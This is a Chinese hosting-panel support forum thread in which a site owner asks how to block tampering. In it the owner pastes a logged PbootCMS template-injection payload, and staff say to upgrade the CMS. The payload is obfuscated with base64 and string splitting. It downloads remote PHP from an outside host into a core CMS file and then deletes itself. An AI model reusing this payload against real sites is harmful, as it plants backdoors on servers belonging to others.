【待反馈】关于Nginx防火墙防篡改

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：9.5

系统版本：9.1

问题描述：被篡改

相关截图（日志、错误）：/{pboot:if(("file_put_co"."ntents")("temp.php",("base6"."4_decode")("PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9tYTEudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=")))}{/pboot:if}/../../?p=20请问这种怎么防御

一盆袜子 · 发表于 2024-8-8 08:40:51

宝塔技术-小强 · 发表于 2024-8-8 09:22:28

这个是pbootcms 漏洞的payload 。你可以登录pbootcms后台把程序升级到最新版本。

宝塔技术-小强 · 发表于 2024-8-8 09:22:43

防火墙会后续增加对这块的拦截

一盆袜子 · 发表于 2024-8-8 11:39:10

宝塔技术-小强发表于 2024-8-8 09:22
防火墙会后续增加对这块的拦截

另外一个现象，最近经常出现这种显示未安装的状态，进入面板刷新几次会显示正常
出现这种现象后，大概率会有被篡改的

运维技术阿闯 · 发表于 2024-8-8 11:51:58

一盆袜子发表于 2024-8-8 11:39
另外一个现象，最近经常出现这种显示未安装的状态，进入面板刷新几次会显示正常
出现这种现象后，大概率 ...

您好，您这边执行bt 16修复一下面板后再查看一下

█ 菠萝云-免费装宝塔,4G内存68 █	█ 易探云·香港/美国vps仅9元 █	▅▆▇ 慈云数据-服务器9.9/月 ▇▆▅	4C4G500M带宽高防69元	【多途云】高防CDN
高防服务器，无视一切流量攻击	A7招租，联系qq394030111	OV/EV SSL证书，可当日签发	【阿里云】宝塔一键部署，5.5折	宝塔一键部署DV,EV,OV,SSL证书
█ 易探云·高防云4核8G仅88元 █	高防CDN全球节点99元	█香港站群新年大促█ 免费试用 █	【阿里云】2核2G，3M，45.1元/年	在线网站测速、批量PING运维工具